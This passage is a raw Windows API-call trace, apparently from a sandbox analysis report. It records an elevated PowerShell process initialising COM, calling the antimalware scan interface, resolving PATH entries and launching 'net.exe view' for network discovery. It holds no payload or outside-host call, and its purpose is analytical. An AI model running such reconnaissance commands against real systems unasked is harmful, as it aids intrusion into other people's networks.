pToken=0x87feb8c) returned 0x0 [0231.792] IUnknown:QueryInterface (in: This=0x320a840, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x87febb0 | out: ppvObject=0x87febb0*=0x320a84c) returned 0x0 [0231.792] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a84c, pThreadType=0x87febdc | out: pThreadType=0x87febdc*=1) returned 0x0 [0231.792] IUnknown:Release (This=0x320a84c) returned 0x0 [0231.792] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x31d4838*=0x1a8, lpdwindex=0x87febcc | out: lpdwindex=0x87febcc) returned 0x0 [0233.932] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 40 os_tid = 0x1174 Thread: id = 41 os_tid = 0x1344 Thread: id = 42 os_tid = 0x1358 Thread: id = 43 os_tid = 0x132c Thread: id = 44 os_tid = 0x13a4 [0200.286] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0200.287] RoInitialize () returned 0x1 [0200.287] RoUninitialize () returned 0x0 [0200.288] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x933f19c*=0x848, lpdwindex=0x933efbc | out: lpdwindex=0x933efbc) returned 0x0 [0200.335] SetThreadUILanguage (LangId=0x0) returned 0xe90409 [0200.896] CoCreateGuid (in: pguid=0x933f008 | out: pguid=0x933f008*(Data1=0x19a86fce, Data2=0x82f5, Data3=0x46f4, Data4=([0]=0x91, [1]=0xc2, [2]=0xf3, [3]=0x53, [4]=0x41, [5]=0xf2, [6]=0x7, [7]=0xc))) returned 0x0 [0200.909] QueryPerformanceCounter (in: lpPerformanceCount=0x933efe8 | out: lpPerformanceCount=0x933efe8*=29594409117) returned 1 [0200.910] AmsiOpenSession () returned 0x0 [0200.910] AmsiScanString () returned 0x80070015 [0202.138] QueryPerformanceCounter (in: lpPerformanceCount=0x933efb0 | out: lpPerformanceCount=0x933efb0*=29717291840) returned 1 [0202.150] EtwEventRegister (in: ProviderId=0x577ce80, EnableCallback=0x5072f5e, CallbackContext=0x0, RegHandle=0x577ce5c | out: RegHandle=0x577ce5c) returned 0x0 [0202.150] EtwEventSetInformation (RegHandle=0x76bb940, InformationClass=0x78, EventInformation=0x2, InformationLength=0x577ce2c) returned 0x0 [0202.151] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x933ee20, nSize=0x80 | out: lpBuffer="ፕﰖက澪스澵\x01耀哔玥᎑ﰖ\x02") returned 0x0 [0202.153] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x933f078*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933f078*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb5, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0202.153] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933efe4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933efe4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0202.153] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb5, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb5, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0202.153] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x933f078*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933f078*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb6, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0202.154] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933efe4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933efe4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb5, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0202.154] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb6, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb6, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0202.310] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x933ea28, nSize=0x80 | out: lpBuffer="") returned 0x0 [0202.313] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x933e944, nSize=0x80 | out: lpBuffer="") returned 0xbc [0202.313] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x933e8cc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0202.316] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x933e8b8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0202.561] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x323c478 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.564] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x933e8c0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0202.565] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x104, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0202.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9f8) returned 1 [0202.565] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x933ea74 | out: lpFileInformation=0x933ea74*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0202.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9f4) returned 1 [0202.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea74) returned 1 [0202.568] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0202.568] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0202.568] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\net.*", lpFindFileData=0x933e79c | out: lpFindFileData=0x933e79c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0202.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0202.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0202.571] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x933e150, nSize=0xbc | out: lpBuffer="抈琉") returned 0x0 [0202.572] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0202.572] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0202.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9f8) returned 1 [0202.572] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x933ea74 | out: lpFileInformation=0x933ea74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0202.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9f4) returned 1 [0202.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea74) returned 1 [0202.572] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0202.572] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0202.573] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\net.*", lpFindFileData=0x933e79c | out: lpFindFileData=0x933e79c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f378a0, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x71f378a0, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x71f378a0, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb400, dwReserved0=0x0, dwReserved1=0x0, cFileName="net.exe", cAlternateFileName="")) returned 0x784d380 [0202.575] FindNextFileW (in: hFindFile=0x784d380, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0202.575] FindClose (in: hFindFile=0x784d380 | out: hFindFile=0x784d380) returned 1 [0202.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0202.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0202.577] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe")) returned 0x20 [0202.588] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x933ed0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933ed0c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb7, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0202.588] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933ec78*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933ec78*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb6, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0202.588] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933ecfc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb7, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933ecfc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb7, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0202.596] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\system32\\net.exe", dwFileAttributes=0x0, psfi=0x933e854, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x933e854) returned 0x4550 [0202.670] GetConsoleWindow () returned 0x9013e [0202.687] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x933e620, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0202.706] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x933e8b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0202.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x933e1b0, nSize=0xbc | out: lpBuffer="抈琉") returned 0x0 [0202.766] CoTaskMemAlloc (cb=0x804) returned 0x785d2d8 [0202.766] GetConsoleTitleW (in: lpConsoleTitle=0x785d2d8, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0202.821] CoTaskMemFree (pv=0x785d2d8) [0202.825] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\system32\\net.exe\" view", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x933e960*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5788064 | out: lpCommandLine="\"C:\\WINDOWS\\system32\\net.exe\" view", lpProcessInformation=0x5788064*(hProcess=0x87c, hThread=0x878, dwProcessId=0x130c, dwThreadId=0x1314)) returned 1 [0202.860] CloseHandle (hObject=0x878) returned 1 [0202.861] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\system32\\net.exe", dwFileAttributes=0x0, psfi=0x933e890, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x933e890) returned 0x4550 [0202.862] GetCurrentProcess () returned 0xffffffff [0202.862] GetCurrentProcess () returned 0xffffffff [0202.862] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x87c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x933eb14, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x933eb14*=0x878) returned 1 [0202.863] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x933eb0c*=0x878, lpdwindex=0x933e92c | out: lpdwindex=0x933e92c) returned 0x0 [0217.948] CloseHandle (hObject=0x878) returned 1 [0218.019] GetExitCodeProcess (in: hProcess=0x87c, lpExitCode=0x933eb78 | out: lpExitCode=0x933eb78*=0x2) returned 1 [0218.063] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0218.118] CloseHandle (hObject=0x87c) returned 1 [0218.119] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933ec9c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933ec9c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb7, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0218.123] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x933e9b0, nSize=0xbc | out: lpBuffer="ळ玡ळ螀环賱蚇￾￿煎玢醼玢聸ո\x04") returned 0x0 [0218.125] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x933e8d8, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0218.125] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x933e8c4, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0218.127] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x323c478 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0218.128] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x933e8cc, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0218.128] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0218.128] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0218.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea04) returned 1 [0218.128] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x933ea80 | out: lpFileInformation=0x933ea80*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea00) returned 1 [0218.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea80) returned 1 [0218.129] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0218.129] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0218.129] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Write-Output.*", lpFindFileData=0x933e7a8 | out: lpFindFileData=0x933e7a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea2c) returned 1 [0218.130] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0218.131] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0218.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea04) returned 1 [0218.131] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x933ea80 | out: lpFileInformation=0x933ea80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0218.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea00) returned 1 [0218.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea80) returned 1 [0218.131] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0218.131] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0218.131] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\Write-Output.*", lpFindFileData=0x933e7a8 | out: lpFindFileData=0x933e7a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea2c) returned 1 [0218.132] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0218.132] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0218.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea04) returned 1 [0218.132] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x933ea80 | out: lpFileInformation=0x933ea80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0218.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea00) returned 1 [0218.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea80) returned 1 [0218.132] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0218.132] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0218.132] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\Write-Output.*", lpFindFileData=0x933e7a8 | out: lpFindFileData=0x933e7a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea2c) returned 1 [0218.133] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0218.133] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0218.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea04) returned 1 [0218.133] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x933ea80 | out: lpFileInformation=0x933ea80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0218.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea00) returned 1 [0218.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea80) returned 1 [0218.135] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, 